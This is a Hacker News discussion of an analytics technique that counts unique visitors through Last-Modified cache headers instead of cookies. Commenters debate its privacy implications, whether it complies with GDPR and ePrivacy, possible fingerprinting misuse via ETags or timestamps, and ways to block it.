to be a hash of | the content. | | Thinking about this problem, why does the browser expose any | information about what's in the cache? Client-side JavaScript | can't tell what's in the cache because it's an obvious | security issue. Why let the server know? | | Browsers should ask for the hashes on a list of content | without exposing their cache contents. Then the browser can | request anything thats changed. | jefftk wrote: | The way If-None-Match is that the browser says "give me the | latest if this ETag represents an out-of-date resource, | otherwise I'll keep using my copy." It's not clear to me | how you're proposing this work instead? | | (Also, in many cases the server uses a hash of the inputs | to generating the resource, which isn't something | externally verifiable) | jefftk wrote: | ETag doesn't have any assurance that it's a hash of the page | contents: the current protocol doesn't stop the server from | embedding arbitrary information in the ETag, and there's no | way for the client to tell. | debugnik wrote: | Neither does Last-Modified, as we just saw. If we were | going to alter the meaning of a header for this, it should | be ETag. Just agree on ETag formats that browsers can | verify are just hashes, and have them throw away any opaque | ETags or dates. | jefftk wrote: | You'd need to introduce something new for that. Many | servers compute ETags today as hashes of _inputs_ to a | process. | | (Which is nice computationally, since you can immediately | say "not modified" instead of building the response, | hashing it, and throwing it away if the hash matches) | debugnik wrote: | Well, I said "just hashes" for sort, but such ETag | formats could agree on other algorithms as well, as long | as the browser can verify them. | | And introducing a new method doesn't solve the issue of | deprecating the existing abusable methods, which is why I | suggested one that can already be implemented by privacy- | first browsers one-sidedly. Servers would then be | pressured to migrate to some friendly ETag format if they | don't want to completely lose client-side caching for a | (hopefully growing) share of their userbase. | Isinlor wrote: | This is really no different than a cookie - basically the same | mechanism from the view of the server just different semantics. | geocar wrote: | Well, yes you could have a cookie with C=C+1 and carefully set | the expiration to the end of the day (like the article), or you | could use randomly generated last-modified times and | deduplicate server-side (similar to how cookies are usually | used), but I can think of a few reasons the cache would give | greater precision, so even if a lot of the same things are the | same, I'm not so sure it's really "no different"; these things | are pretty important to (some) publishers: | | - third-party cookie blocking/notification features in browsers | | - review processes on ad networks checking for actual cookies | rather than suspicious last-modified times | legitster wrote: | If anything, this is worse. | | Cookies have built in browser behavior - they have limited | scope, the browser lets you see them, they get cleared out | regularly. | | Abusing metadata is way sketchier. | eurasiantiger wrote: | Chances are they aren't the first to come up with something | like this. How can we detect this kind of metadata abuse? | fanso99 wrote: | perhaps randomize minutes/seconds of the "last-modified" | header. | notpushkin wrote: | Or perhaps just drop minutes/seconds. And maybe don't | store the date altogether for files that are small | enough? | pornel wrote: | Important to note that privacy laws that regulate tracking are | not limited to the Cookie header. They apply to tracking and | data collection in general, regardless of how technically | clever you make it. | ape4 wrote: | Yes, cookies are a header field sent back by the browser and so | is this. | pavon wrote: | Exactly. They could have the same functionality and privacy | characteristics if they simply kept a cookie that incremented | each time the site was visited. The fact that they didn't go | this route suggests this is more about finding a way to track | unique visitors when cookies are disabled. They are | deliberately subverting the user's desire to not be tracked and | spinning it as a privacy win. | dahfizz wrote: | If it was about tracking users, wouldn't they generate a | unique timestamp per visitor on the first visit? Giving | everyone the same timestamp is a terrible way to try and | track individuals. | dvko wrote: | This is part of why I quit my privacy focused analytics start- | up years ago. I won't name it directly, but it was one of the | first and is still going strong (although not really open- | source anymore). | | People kept asking for cookieless tracking but with another way | of identifying returning visitors that was always worse from a | privacy standpoint. Cookies can be controlled by the client, | anything stored on the server can not. | | Honestly, cookies are pretty nice, it's the law around this | that sucks. Tricks that attempt to bypass the laws will surely | only work for a limited time, at least I hope they will... | yunruse wrote: | Hm, on Safari 16.1 it seems reloading twice clears the cache and | therefore the counter (but eg cmd-W cmd-Z cmd-R will safely | increase it). Either way, I think I would prefer this behaviour | to be some sort of cookie that the law okays, because as everyone | else has said, I'm quite browsers will fuzz these data. | | (I would probably go for a Gaussian fuzzer each visit, just | because it adds the off chance that it's quite a way away from | any attempted ID, making it a little bit more difficult to cast a | wider net and get a few bits of entropy) | mikem170 wrote: | Their demo counter [0] didn't work in my browser, maybe because I | normally have javascript disabled. | | In the demo it seems they have XMLHttpRequest code calling | ping.withcabin.com/cache for this trick of theirs. | | Can this method of counting be made to work without javascript? | | [0] https://lastmodified.normally.com/ | zagrebian wrote: | > Many privacy-focused analytics services will generate and store | a UID on the server instead of saving it in a cookie - based on a | hash of your User Agent, IP, Location, Date etc. | | What location? The Geolocation API? | | What date? How can a date contribute to a UID? Each visitor sends | multiple HTTP requests at different dates. | notpushkin wrote: | If it's anonymous and doesn't collect any user data, why do we | need it at all? Would using a cookie for the same purpose (just a | counter of visits, resetting every day) trigger the GDPR laws | somehow? It would work in literally same way except being | transparent to the user instead of utilizing some shady | technique. | zzo38computer wrote: | It should be able to detect that the date is not valid (and that | their precision is wrong), and avoid sending a "If-Modified- | Since" header. (The same would be true if they were assigned at | random rather than sequential like this; it still should be able | to detect that they are not valid and have wrong precision.) | [deleted] | birdmanjeremy wrote: | The demo doesn't work in safari on my mac. It sometimes gets to | 2, but on refresh goes back to 1. Actually, got it up to 4 one | time. Seems like the claims of "Works in any browser and any | server" are overstated. | devmunchies wrote: | same. I got it up to 8 by clicking into the address bar and | hitting enter. However, doing a refresh instead caused it to | reset (the browser didn't send the if-modified-since header so | the server didn't do it's little trick and instead started | over) | alexmolas wrote: | What if during a day I visit the website more than 86400 times? | ;) | speedgoose wrote: | > This is great for privacy as we don't need to use cookies, IP | addresses, fingerprinting or unique identifiers. In our tests, | this method proved durable enough to be the most reliable method | of counting unique visitors without using cookies. | | The differences with a cookie are that the header is named Last- | modified instead of Set-Cookie and Cookie, and the value must be | a datetime in the RFC2616 format. | | How is it good for privacy? I think it's worse because it's | invisible for the user. I would bet tracking visitors using such | an hack isn't compatible with GDPR, that requires an informed | consent for tracking. And good luck explaining your hack to the | average visitor. | Etheryte wrote: | You seem to slightly misunderstand how GDPR works. Tracking in | and of itself is not the problem, it's personal data and | personally identifying data that is. You can count how many | hits your server receives no problem, this is roughly the same | idea. | havkom wrote: | Basically the "cookie consent" part in the EU stems from the | e-privacy directive. Article 5.3 refers to GDPR (through the | directive that is replaced by GDPR) and reads: | | Member States shall ensure that the storing of information, | or the gaining of access to information already stored, in | the terminal equipment of a subscriber or user is only | allowed on condition that the subscriber or user concerned | has given his or her consent, having been provided with clear | and comprehensive information, in accordance with Directive | 95/46/EC, inter alia, about the purposes of the processing. | This shall not prevent any technical storage or access for | the sole purpose of carrying out the transmission of a | communication over an electronic communications network, or | as strictly necessary in order for the provider of an | information society service explicitly requested by the | subscriber or user to provide the service. | | In short, this method may fall under the EU "cookie law" | above. The use of timestamps may require consent if they are | used to distinguish users (even if only for counting | purposes). The timestamps may then also be personal data | under the GDPR. | luckylion wrote: | This is equivalent to setting a cookie with a hit count. It's | still storing & submitting information, it's just not using a | unique identifier (Which is pretty privacy-respecting, I'm | not saying it's a terrible thing or something). | | I assume it will be treated as such, too. If you can use a | cookie to do this without consent, this is fine too. If you | can't then it's not. The same happens for local/session | storage: it's cookie-equivalent. | xyproto wrote: | The user with the highest visit count will always be | uniquely identifiable, though. | not2b wrote: | Only on the same day. Everything is reset the next day. | jiveturkey wrote: | I don't follow how this is a problem. | | By that measure, any users behind a unique single IP (no | IP pooling, no CGNAT, etc) will always be uniquely | identifiable. And for IP there's much fewer steps to | personally identify the user. The server necessarily sees | the user IP. | speedgoose wrote: | Yes, the IP can be used to identify people. If you want | to track users using their IP and respect GDPR, you need | to get their consent first. | | The best is to not store them before you get consent. | Having a temporary access log with a few IPs is probably | fine. But keeping all your access logs forever for | analytics purposes is not fine anymore. | speedgoose wrote: | I will quote the law: | | > Natural persons may be associated with online identifiers | provided by their devices, applications, tools and protocols, | such as internet protocol addresses, cookie identifiers or | other identifiers such as radio frequency identification | tags. This may leave traces which, in particular when | combined with unique identifiers and other information | received by the servers, may be used to create profiles of | the natural persons and identify them. | jakobdabo wrote: | ETag (paired with If-None-Match header sent by the browsers) is | another caching header to be aware of. | | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET... | doomrobo wrote: | Ooh that's kinda evil. A server could give a client a uniquely | identifying ETag for a given URL. So whenever the client comes | back on the same browser, they're identified. | | Fortunately this is probably just as detectable as the Last- | Modified abuse in the post. | bawolff wrote: | There are a lot of things like that. Although browsers | changed it recently, you also used to be able to use TLS | session tickets. | | Another one was the favicon cache. | | Pretty much any state on the browser can be used to track | people. | mulhoon wrote: | Hi, author of the article here. | | Just to give a little more background here. | | Cabin doesn't store a row in a database for each visit. It only | stores one row, per day per domain. The attributes for that row | are simple tally counts - visits, uniques, bounces etc. So no | identifier is stored, and the hits go into the tally. We do not | store the fact that a user has visited x amount of times. The | demo here is to show how the technique works. | | Cabin used to detect only the presence of _any_ last-modified | date to determine if the visit is unique or not. But extending it | to distinguish hits 1,2 and 3 (by adding 1 second to the start of | the day) now allows us to count the bounce rates too. | ohbtvz wrote: | Have lawyers familiar with EU law vetted your technique? Could | you share their legal reasoning? If not, why would anyone ever | take the risk to use your product and face huge fines? | senko wrote: | (Not OP) | | I am all for privacy, use uBO, Firefox Focus / Incognito and | Google alternatives. But if I have to consult a lawyer each | time I write some code or write up a blog post, I'll take up | gardening instead. | jefftk wrote: | The OP is a "privacy-first web analytics" company; this is | totally something they should be asking their lawyers. | | Note that their list the GDPR on their "Privacy law | compliance" page (https://docs.withcabin.com/privacy.html) | but not ePrivacy... | ohbtvz wrote: | No need for this kind of hyperbole. I wouldn't ask this | question if the OP's post didn't contain grandiose claims | such as "No cookies, no consent banners, no ad networks, | 100% GDPR & CCPA compliant, low footprint web analytics." | OP made a claim about their compliance with EU law. I'm | asking for proof or at least an explanation. | rcoveson wrote: | How about just consulting a lawyer each time you abuse a | protocol to get user's software to behave in a way that is | invisible to them and benefits you? | | There is already a correct way to tell a browser to tell | the server something with each subsequent request: Cookies. | Nobody needs to "write some code" here; it's already | written. Working around the protocol isn't engineering, | it's just lying. | | This blog post is just another cynical degredation of trust | between users and their browsers, and browers and the | servers they talk to. Just another part of HTTP that we | can't use for what it was designed for anymore because | servers want so desperately to track visitors uniquely and | a significant subset of visitors would prefer not to be | remembered uniquely. | jefftk wrote: | Your landing page says "no cookies or consent banners" and | "compliant with all privacy laws", but the timestamp approach | stores data on a user's computer in a way that is not "strictly | necessary in order to provide an information society service | explicitly requested by the subscriber or user". Could you | explain how you see your approach as compliant with the | ePrivacy directive? | | Full text: https://eur-lex.europa.eu/legal- | content/EN/TXT/HTML/?uri=CEL... | | Guidance: | https://ec.europa.eu/justice/article-29/documentation/opinio... | IshKebab wrote: | Yeah this is just a cookie by another name. Probably already | used by supercookies. | | The GDPR doesn't single out cookies so you can't get around | it by using a different storage device. | jefftk wrote: | _> The GDPR doesn 't single out cookies so you can't get | around it by using a different storage device._ | | Quibble: this isn't a GDPR issue, it's an ePrivacy issue. | Two different regulations. | lolinder wrote: | Thanks for sharing! | | I personally don't have an issue with it, but one thing that | might set some of the people here at ease is if you stopped | incrementing the timestamp after the second visit. | | This would give you three possible states anyone could be in: | never visited, visited once, and visited more than once. It's | less data, but still enough to give you your bounce rate _and_ | your total visits while minimizing the number of boxes you 're | sorting individual visitors into. | josephscott wrote: | This reminded me of something I haven't thought about in awhile: | evercookie - https://github.com/samyk/evercookie | [deleted] | tobr wrote: | That's pretty clever. I think if you really want to keep it | privacy respecting, you should stop counting at 1 - so you can | distinguish the first vs subsequent visits, but you can't tell if | someone has visited 2 or 200 times. | AkshatJ27 wrote: | what is the problem with letting a website know how many times | I have visited the page? How is it better for a website to only | know if I have visited earlier or not? | xyproto wrote: | Many clients may have visited only one time, but when you | reach higher numbers they may be used together with other | data to help identify users. | | Maybe only one user will have over 100 visits, and then you | can uniquely identify them. | barefeg wrote: | Makes sense. I'm not very experienced in privacy but could | you explain why uniquely identifying the user is a problem? | As in you can tell that there's one user who visited 100 | times but how can you use that information to correlate | with an identity? | _justinfunk wrote: | This is also my question that all the people wearing | their smart lawyer hats seem to be claiming but not | explaining. | WirelessGigabit wrote: | Every subsequent visit they bump up the number. | cortesoft wrote: | I am having trouble understanding how knowing someone has | visited three times is more privacy invasive than knowing they | visited twice. What is so magical about 3? | tobr wrote: | Consider that there's some long tail of visitors who visit | many times in one day. Someone is going to be visiting more | times than anyone else, whether that's 10 or 100 or 1000 page | views. That person is now uniquely trackable. To avoid that | situation you need to stop counting somewhere, and you're not | really getting any new info after 1 (well, 2 I suppose, if | you want to track bounces), so you might as well stop there. | dahfizz wrote: | I don't agree that the existence of this header makes a | user more trackable. You can already uniquely identify | visitors with their IP & source port, which is included in | every single packet and is way more specific than some | timestamp. | | Your argument seems to be that this timestamp in the header | could possibly be used as a lookup key in a database of | visitors. I think that's a stretch, but in any case that | database would be the privacy violating thing. This header | is completely anonymous. | tobr wrote: | You're probably right! But since they aren't getting any | more info by continuing to count after 2, it's just a | liability to do it. After all, the whole point of the | setup seems to be to minimize the amount of unique | information the system has to process. | o_m wrote: | Counting to two is needed to handle the bounce rate. | kube-system wrote: | 3 is magical in that it comes after 2. | | If 100 people visited once, and one person visited twice... | then a new request with visitCount=3 is that second person. | Jabdoa2 wrote: | I guess according to GDPR this counts as tracking nontheless. | GDPR does not specifically mention cookies or anything technical. | An identifier is enough (does not have to be a uuid). IP, | location, browser etc already counts. This probably would count | as storing something like a cookie on the client. | WirelessGigabit wrote: | I wonder how this works with systems like Akamai which by default | mess with those headers. | DueDilligence wrote: | .. and we're fast on-track of a webkit extension to block this | BS. | cactacea wrote: | Why block it entirely when you can just feed them garbage data? | cpeterso wrote: | Sending a garbage Last-Modified time might confuse the server | and cause unpredictable problems for the user. Blocking it is | safe because the server will just assume this is the first | time the user has visited the website. | enkrs wrote: | Whats the motivation to block/misinform? | | This allows site owners get statistics on page | views/uniques/bounces without unique identifier cookies or | javascript injections. | | I'm all for blocking any abusive tracking methods, but this | looks to me like creative website statistics that works for | single domain. What's the harm by measuring that? | michaelt wrote: | While this _particular_ implementation doesn 't track | individuals, couldn't your trivially start tracking | individuals by sending them unique random times like _last- | modified: 12 Mar 1978 12:34:56 GMT_ thereby giving them a | ~30 bit unique identifier for as long as the file is | cached? | pwdisswordfish0 wrote: | Only if you disregard the amount of latitude that the | semantics of these headers give to UAs that would | effectively thwart this method of tracking. | | If I fetch your /foo.html today in November 2022, and you | send me a last-modified from 1978, that gives me and my | UA a huge range from which to select a different datetime | (anywhere between the 1978 value and now-ish) on my next | request. How are you going to correlate my original and | subsequent requests if in the latter I ask if you've got | a copy that's been modified since 1999? | marshray wrote: | Sure, a UA _could_ do a whole lot of things to resist | fingerprinting. | | But users go to the web with the browser they've been | given. | | Apple, famously, forbids its users to speak HTTP with | anything else on iOS. | nkrisc wrote: | > Whats the motivation to block/misinform? | | What's the motivation to submit to it? | yojo wrote: | Allowing websites to get a somewhat accurate count of | visitors plus bounce rate helps them to tell how they're | doing. Hopefully, they use that to guide developing a | better product/service. | | If you can allow them to do that without getting tracked, | it's win-win. You get a better experience when they build | a better service. | yojo wrote: | To be clear, they're not generating _unique_ headers. They're | setting them to the day start, so they can tell if the | requester has already been to the site today or not. It | actually seems pretty reasonable. | pavon wrote: | They way they are using it is providing less information than | a UID cookie would, but the same amount of information as a | boolean "previously visited" cookie. However, now that the | technique is known there is nothing stopping people from | using the same method to store a UID date, and privacy | protecting clients will have difficulty differentiating | between the two, so best to eliminate this as a | fingerprinting method altogether. | not2b wrote: | People keep saying in this thread "there is nothing | stopping people from using the same method" to do something | else! I think that this is an irrelevant criticism. This is | a valid attempt to minimize the amount of information | collected on visitors and still providing a unique visitors | per day count, and the fact that someone could build a | similar but different system that looks like a cookie isn't | relevant. | pavon wrote: | They demonstrated a PoC that uses an HTTP feature in a | way it wasn't intended to add entropy to fingerprinting | techniques. Discussing how this same exploit could be | used maliciously by others and how to prevent that isn't | criticism of the PoC, it is standard security practice. | chipsa wrote: | But you can't have as many bits in a UID date as for a | generic cookie, and a privacy protecting client could just | ignore the ones that don't make sense. Does a 1978 date | make sense? Probably not. You could scale this up to the | millions, probably, but it won't scale infinitely. | genewitch wrote: | roblox has ~50mm daily users (DAU), and if my math is | correct (it probably isn't) you could have hour | granularity (only 0-23) timestamps on 6 files, each day, | and track 191mm unique users. I used roblox because i | knew their DAU off-the-cuff - because roblox requires a | login, they know who you are anyhow. | | But if you do 1 second granularity a mere 2 cache | timestamps are enough to fingerprint everyone on the | planet, each day. | | is my math wrong, here? | rnhmjoj wrote: | There probably is one already: this method is so old that the | documentation of privoxy shows[1] how to defeat it. I can | confirm it works: their example[2] website says I've visited | 61996 times. | | [1]: https://www.privoxy.org/user-manual/actions- | file.html#OVERWR... | | [2]: https://lastmodified.normally.com/ | jesprenj wrote: | What's the reason for not storing a cookie? It's not like | browsers that don't support cookies are targeted, right? Cookies | can also be "great for privacy", if their power is not abused | server-side ... | jefftk wrote: | I think this is probably illegal in EU countries. The ePrivacy | Directive requires consent before storing data on a user's | machine that isn't strictly necessary for providing the service | the user requested. Analytics isn't "strictly necessary", and | ePrivacy doesn't care whether you use the Cookie header or some | other method of storage. | | I do think this is better for privacy than standard id-based | approaches, but the law is very strict. More: | https://www.jefftk.com/p/why-so-many-cookie-banners | | (Not a lawyer) | yellow_lead wrote: | Assuming you're correct, can anyone think of a way to count | unique visitors without storing data on a users machine _or_ | using identifiable user information? Identifiable user | information should include hashes that can be re-computed given | the original information. | | This isn't a criticism of the law, I'm just curious what | options there could be, because I can't think of any. | genewitch wrote: | Hi there, Marketing Company Intern! | | Tell them you'd rather make the coffee ;-) | 411111111111111 wrote: | Ha, that would explain that question. My first reaction was | mostly confusion as there is so much prior art at this | point, i.e. fingerprinting through installed add-ons, | resolution/window size/system language, browser language, | IP locality etc. There are even demo pages around which | shows you just how unique your configuration is even | without anything else. | | https://amiunique.org/fp | yellow_lead wrote: | Lol, I knew it would sound that way, but I don't work in | this domain - just interested in privacy and this problem. | genewitch wrote: | the only reason we could think of for wanting unique | visitors was for the marketing people or | investors/stakeholders/shareholders. Parsing the request | logs should be sufficient for every other metric. | | We had a bunch of meetings about this at what essentially | amounted to a giant information superhighway billboard | company. IIRC someone brought up using cache headers even | back then, because it didn't require cookies or | javascript, which we couldn't guarantee would be "up to | date", this is back in "target IE6, still" days. | | As one of my networking friends said, advertisers usually | know everything about your metrics, even if you don't. | You can't really fudge the numbers in your favor, so raw | requests or QPS or whatever ancillary metric would be | enough. | | the method in the article is defeated by clearing your | session when you're done browsing, or using | incognito/private browsing tab, as that should mark all | "cached" items for deletion. | [deleted] | Quarrelsome wrote: | I thought GDPR cared mostly about uniquely identifying visitors | which this does not do. You still need a cookie banner to state | that you will put some data on their machine but you always | need one of those. | jefftk wrote: | _> you always need one of those_ | | The withcabin.com landing page claims you don't need consent | banners to use it. | t0mas88 wrote: | That claim is false in Europe. You need to ask permission | for this approach, because you're storing something on the | user's device (the generated date in the cache) that isn't | strictly necessarily. The ePrivacy directive says you need | permission for that, nowhere does the law specify "cookies" | it's about any kind of data stored on the user device. | jefftk wrote: | Uh, yes? That's exactly what I've been saying upthread. | mgrund wrote: | True it does not matter if it's a cookie, or whatever. | You need to look to the ePrivacy directive article 5.3 | for which exemption case applies. In the case of | timestamps, it would be case A : | | > when the cookie is used "for the sole purpose of | carrying out the transmission of a communication over an | electronic communications network" ("Exemption A") | | Since the timestamp is no longer used solely for this | purpose, you need consent. | bvinc wrote: | What's to stop someone from sending unique last-modified dates to | uniquely fingerprint browsers? | nightpool wrote: | Because the cache key for the site is partitioned by top-level | origin in modern browsers, they wouldn't get any additional | information this way that they couldn't get with existing | first-party storage techniques, such as service worker caches, | session cookies, IndexedDB, etc. See e.g. | https://developer.mozilla.org/en-US/docs/Web/Privacy/State_P... | for example. Opening a new incognito window would trivially | defeat this method of "tracking". This is basically just a very | small first-party-only cookie. | SahAssar wrote: | Then why not use a cookie? The laws regarding tracking are | not actually about cookies, but about all cookie-like | tracking. What does this method gain? | nightpool wrote: | The ability to put "no cookies :)" in your marketing | materials | [deleted] | 1vuio0pswjnm7 wrote: | What happens if the user disables Javascript. | | The page lastmodified.normally.com claims "Works in any browser | or any server". What if the browser has no Javascript engine. | | In this case I tried the demo with a browser that has a JS | engine, with JS enabled, and the demo still did not work. That is | because "ping.withcabin.com" was not disclosed to the user. The | OP suggests that users access "lastmodified.normally.com". It | says nothing about accessing "ping.withcabin.com". As such, the | proxy does not contain any address info for that domain. The user | (me) never typed it. | | Instead of a browser, I use a localhost-bound forward proxy to | control requests and responses, including HTTP headers. The proxy | contains all of the domain-to-IP address mappings I need in | memory. Why should I add an IP address for "ping.withcabin.com". | The request returns no content. | | 1. For example, something like acl cabin | hdr(host) -m str ping.withcabin.com http-request del- | header If-Modified-Since if cabin http-response del- | header Cache-Control if cabin http-response del-header | Last-Modified if cabin | bennyp101 wrote: | Seems a fairly benign way of counting how many people are | visiting your site. | | Not like its tracking you across domains and services, more a | counter for how many people have visited, and either stayed and | looked around, or left. | meowface wrote: | >Not like its tracking you across domains and services | | The same can be said of first-party cookies. ___________________________________________________________________ (page generated 2022-11-30 23:00 UTC)